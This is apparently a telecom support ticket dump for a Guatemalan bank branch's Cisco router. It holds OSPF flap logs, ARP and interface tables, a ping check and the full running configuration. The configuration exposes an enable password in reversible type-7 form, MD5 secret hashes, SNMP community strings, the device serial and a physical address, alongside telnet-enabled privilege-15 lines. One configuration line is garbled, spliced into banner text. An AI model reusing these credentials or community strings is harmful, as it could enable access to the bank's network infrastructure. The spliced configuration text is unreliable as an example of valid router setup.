MAY 11 18:55:37.519 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 11 18:55:47.095 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 11 19:06:37.695 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 11 19:07:12.139 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 11 20:02:07.022 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 11 20:02:28.118 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 11 20:43:37.258 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 11 20:44:17.102 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 11 23:06:37.230 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 11 23:06:42.110 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 11 23:23:07.358 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 11 23:23:12.626 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 11 23:27:07.418 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 11 23:28:12.038 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 00:57:19.145 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 01:00:36.889 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 01:00:41.905 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 01:17:07.061 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 01:17:12.105 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 01:25:58.701 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 01:40:07.381 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 01:40:12.257 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 01:42:07.393 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 01:42:12.749 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 01:53:14.777 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 02:17:57.769 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 02:28:37.741 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 02:28:43.109 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 03:26:07.085 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 03:26:12.329 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 08:13:07.111 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 08:13:12.047 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 11:09:37.443 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 11:09:51.547 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 16:24:36.657 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 16:24:41.885 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 17:18:07.129 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 17:18:17.149 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 17:23:07.205 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 17:23:12.141 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 19:21:04.757 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 19:21:09.669 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 19:25:17.649 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 20:21:09.404 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 21:39:04.852 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 21:39:10.056 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 22:40:30.320 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 22:40:40.364 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 12 23:24:05.648 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 12 23:24:10.612 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 13 01:18:05.327 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 13 01:18:10.115 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 13 01:59:05.631 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 13 01:59:10.655 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 13 02:23:04.759 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 13 02:23:09.799 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 13 02:33:04.855 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 13 02:33:09.791 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 13 03:11:35.103 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 13 03:11:49.067 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
CC_BANRURAL_GT_AGENCIA_0591#
SHOW CLOCK
03:22:01.635 UTC FRI MAY 13 2022
CC_BANRURAL_GT_AGENCIA_0591#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.190.1             3   A4BE.2BE5.7F1F  ARPA   GIGABITETHERNET0/0.1
INTERNET  10.72.190.60            -   7081.05D7.89C0  ARPA   GIGABITETHERNET0/0.1
INTERNET  10.72.190.133           -   7081.05D7.89C1  ARPA   GIGABITETHERNET0/1.2249
INTERNET  10.135.91.17            -   7081.05D7.89C3  ARPA   VLAN1
INTERNET  10.135.91.22            0   F08E.DB17.A9E2  ARPA   VLAN1
INTERNET  10.165.91.126           -   7081.05D7.89C3  ARPA   VLAN1
CC_BANRURAL_GT_AGENCIA_0591#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          INITIALIZING   DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/8901167T/_/
GI0/0.1                        UP             UP       WAN PRINCIPAL/_/8901167T/_/
GI0/1                          UP             UP
GI0/1.2249                     UP             UP       WAN REDUNDANTE/_/8901680T/_/
GI0/0/0                        UP             UP
GI0/0/1                        DOWN           DOWN
GI0/0/2                        DOWN           DOWN
GI0/0/3                        DOWN           DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_BANRURAL_GT_AGENCIA_0591#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  INITIALIZING          DOWN
GIGABITETHERNET0/0         UNASSIGNED      YES NVRAM  UP                    UP
GIGABITETHERNET0/0.1       10.72.190.60    YES NVRAM  UP                    UP
GIGABITETHERNET0/1         UNASSIGNED      YES NVRAM  UP                    UP
GIGABITETHERNET0/1.2249    10.72.190.133   YES NVRAM  UP                    UP
GIGABITETHERNET0/0/0       UNASSIGNED      YES UNSET  UP                    UP
GIGABITETHERNET0/0/1       UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0/0/2       UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0/0/3       UNASSIGNED      YES UNSET  DOWN                  DOWN
LOOPBACK5                  10.212.120.194  YES NVRAM  UP                    UP
VLAN1                      10.165.91.126   YES NVRAM  UP                    UP
CC_BANRURAL_GT_AGENCIA_0591#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN BANRURAL 10.72.190.60
  PING 10.72.190.60: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.190.60 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/3/13 MS
RUTA IP:
PE: 10.179.28.33
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BANRURAL 10.72.190.60
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BANRURAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.72.190.60/32  DIRECT  0    0                 0.0.0.0         VLANIF184</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE PROCEDE CON CIERRE .
ROUTER CPE ACTIVO HACE 2 DÍAS.
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.1(4)M1, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2011 BY CISCO SYSTEMS, INC.
COMPILED TUE 14-JUN-11 17:44 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M9, RELEASE SOFTWARE (FC1)
CC_BANRURAL_GT_AGENCIA_0591 UPTIME IS 2 DAYS, 3 HOURS, 34 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM RESTARTED AT 23:47:08 UTC TUE MAY 10 2022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UZ
6 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
250880K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1941/K9          FTX153983UZ
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_BANRURAL_GT_AGENCIA_0591#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 7043 BYTES
!
! NO CONFIGURATION CHANGE SINCE LAST RESTART
VERSION 15.1
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_BANRURAL_GT_AGENCIA_0591
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$EZA5$FGB8G9T9H8FIT.A86A8DL1
ENABLE PASSWORD 7 0010160A034E0A
!
NO AAA NEW-MODEL
!
NO IPV6 CEF
IP SOURCE-ROUTE
IP CEF
!
!
!
!
!
NO IP DOMAIN LOOKUP
IP DOMAIN NAME YOURDOMAIN.COM
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CRYPTO PKI TOKEN DEFAULT REMOVAL TIMEOUT 0
!
CRYPTO PKI TRUSTPOINT TP-SELF-SIGNED-4094810339
 ENROLLMENT SELFSIGNED
 SUBJECT-NAME CN=IOS-SELF-SIGNED-CERTIFICATE-4094810339
 REVOCATION-CHECK NONE
 RSAKEYPAIR TP-SELF-SIGNED-4094810339
!
!
CRYPTO PKI CERTIFICATE CHAIN TP-SELF-SIGNED-4094810339
 CERTIFICATE SELF-SIGNED 01
  3082022B 30820194 A0030201 02020101 300D0609 2A864886 F70D0101 05050030
  31312F30 2D060355 04031326 494F532D 53656C66 2D536967 6E65642D 43657274
  69666963 6174652D 34303934 38313033 3339301E 170D3134 30313039 32323438
  31395A17 0D323030 31303130 30303030 305A3031 312F302D 06035504 03132649
  4F532D53 656C662D 5369676E 65642D43 65727469 66696361 74652D34 30393438
  31303333 3930819F 300D0609 2A864886 F70D0101 01050003 818D0030 81890281
  8100E406 D09E3594 A1FE33E3 CB5E0E9B 66C4EC16 9E38EFF8 5C946D14 3AC1FB91
  8C9BF59C 7FF1F517 9F6587B7 AE391C76 A3A74258 B09CB2FC 6128AAB7 E3E8C1F5
  723672F3 E1DD549A 3A839A7A A5148F61 D77E2228 F1149F7B C9391117 8AC21145
  F404D952 B042DBF7 606E483F 6B694316 FA57A2FE 290C9299 13FF02E5 01C746A7
  A13D0203 010001A3 53305130 0F060355 1D130101 FF040530 030101FF 301F0603
  551D2304 18301680 143287BF B4C3B576 276C6C08 9E5ACFC2 0D1A6629 BE301D06
  03551D0E 04160414 3287BFB4 C3B57627 6C6C089E 5ACFC20D 1A6629BE 300D0609
  2A864886 F70D0101 05050003 81810097 AAD41B39 53B823CF 8C6DA589 BA1708DB
  A27FCADD 0AFF7DC2 AE654527 371B9195 62F42FEB 4913FF94 78715C27 6BB7EFE5
  C034E76D AEAB8462 949AB0E3 A8DC62ED C4AE84C2 B5D8BB28 05097D18 2613A6CD
  472B9793 B79C12BF 1BFC1823 E3BF41E0 AA1840F4 907CC53F 34520E7D 018332DF
  2DED989A 65C21426 0228BA6C 385576
  	QUIT
LICENSE UDI PID CISCO1941/K9 SN FTX153983UZ
!
!
VTP MODE TRANSPARENT
USERNAME GESTIONIP SECRET 5 $1$GNVL$TL4AG6BVN8AE9YYUU1ZQP/
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.120.194 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/8901167T/_/
 BANDWIDTH 4096
 NO IP ADDRESS
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
 NO CDP ENABLE
!
INTERFACE GIGABITETHERNET0/0.1
 DESCRIPTION WAN PRINCIPAL/_/8901167T/_/
 BANDWIDTH 4096
 ENCAPSULATION DOT1Q 184
 IP ADDRESS 10.72.190.60 255.255.255.192
 RATE-LIMIT INPUT 4096000 768000 1536000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 4096000 768000 1536000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 NO CDP ENABLE
!
INTERFACE GIGABITETHERNET0/1
 NO IP ADDRESS
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1.2249
 DESCRIPTION WAN REDUNDANTE/_/8901680T/_/
 BANDWIDTH 2048
 ENCAPSULATION DOT1Q 2249
 IP ADDRESS 10.72.190.133 255.255.255.128
 RATE-LIMIT INPUT 2048000 384000 768000 CONFORM-ACTION CONTINUE EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 2048000 384000 768000 CONFORM-ACTION CONTINUE EXCEED-ACTION DROP
!
INTERFACE GIGABITETHERNET0/0/0
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/0/1
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/0/2
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/0/3
 NO IP ADDRESS
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 10.135.91.17 255.255.255.248 SECONDARY
 IP ADDRESS 10.165.91.126 255.255.255.0
 LOAD-INTERVAL 30
!
ROUTER OSPF 1
 ROUTER-ID 10.72.190.60
 AREA 164 NSSA
 REDISTRIBUTE CONNECTED SUBNETS ROUTE-MAP CONNECTED
 NETWORK 10.72.190.0 0.0.0.63 AREA 164
 NEIGHBOR 10.72.190.1
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
IP HTTP ACCESS-CLASS 23
IP HTTP AUTHENTICATION LOCAL
IP HTTP SECURE-SERVER
IP HTTP TIMEOUT-POLICY IDLE 60 LIFE 86400 REQUESTS 10000
!
IP ROUTE 0.0.0.0 0.0.0.0 10.72.190.129 225 NAME REDUNDANTE_WIMAX
!
!
IP PREFIX-LIST CONNECTED SEQ 5 PERMIT 10.168.53.0/24
IP PREFIX-LIST CONNECTED SEQ 10 PERMIT 10.212.120.194/32
IP PREFIX-LIST CONNECTED SEQ 15 PERMIT 10.165.91.0/24
IP PREFIX-LIST CONNECTED SEQ 20 PERMIT 10.135.91.16/29
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 23 PERMIT 10.10.10.0 0.0.0.7
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
ROUTE-MAP CONNECTED PERMIT 10
 MATCH IP ADDRESS PREFIX-LIST CONNEND IT PROVIDES THE DEFAULT USERNAME "CISCO" FOR ONE-TIME USE. IF YOU HAVE CONNECTED
!
!
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION LINEA C 10 LA MAQUINA CALLE PRINCIPAL SUCHITEPEQIEZ CUYOTEN
!
CONTROL-PLANE
!
!
BANNER EXEC ^CC
% PASSWORD EXPIRATION WARNING.
-----------------------------------------------------------------------
CISCO CONFIGURATION PROFESSIONAL (CISCO CP) IS INSTALLED ON THIS DEVICE
AND IT PROVIDES THE DEFAULT USERNAME "CISCO" FOR  ONE-TIME USE. IF YOU HAVE
ALREADY USED THE USERNAME "CISCO" TO LOGIN TO THE ROUTER AND YOUR IOS IMAGE
SUPPORTS THE "ONE-TIME" USER OPTION, THEN THIS USERNAME HAS ALREADY EXPIRED.
YOU WILL NOT BE ABLE TO LOGIN TO THE ROUTER WITH THIS USERNAME AFTER YOU EXIT
THIS SESSION.
IT IS STRONGLY SUGGESTED THAT YOU CREATE A NEW USERNAME WITH A PRIVILEGE LEVEL
OF 15 USING THE FOLLOWING COMMAND.
USERNAME &lt;MYUSER&gt; PRIVILEGE 15 SECRET 0 &lt;MYPASSWORD&gt;
REPLACE &lt;MYUSER&gt; AND &lt;MYPASSWORD&gt; WITH THE USERNAME AND PASSWORD YOU WANT TO
USE.
-----------------------------------------------------------------------
^C
BANNER LOGIN ^CC-----------------------------------------------------------------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INPUT ALL
 TRANSPORT OUTPUT PAD TELNET RLOGIN LAPB-TA MOP UDPTN V120 SSH
 STOPBITS 1
LINE VTY 0 4
 PRIVILEGE LEVEL 15
 LOGIN LOCAL
 TRANSPORT INPUT ALL
 TRANSPORT OUTPUT ALL
LINE VTY 5 15
 ACCESS-CLASS 23 IN
 PRIVILEGE LEVEL 15
 LOGIN LOCAL
 TRANSPORT INPUT TELNET SSH
 TRANSPORT OUTPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
END
CC_BANRURAL_GT_AGENCIA_0591#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 105 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 105 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
    TRAP LOGGING: LEVEL INFORMATIONAL, 109 MESSAGE LINES LOGGED
LOG BUFFER (8192 BYTES):
 PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 11 18:55:37.519 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 11 18:55:47.095 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 11 19:06:37.695 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 11 19:07:12.139 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 11 20:02:07.022 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 11 20:02:28.118 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 11 20:43:37.258 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 11 20:44:17.102 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 11 23:06:37.230 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
MAY 11 23:06:42.110 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
MAY 11 23:23:07.358 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
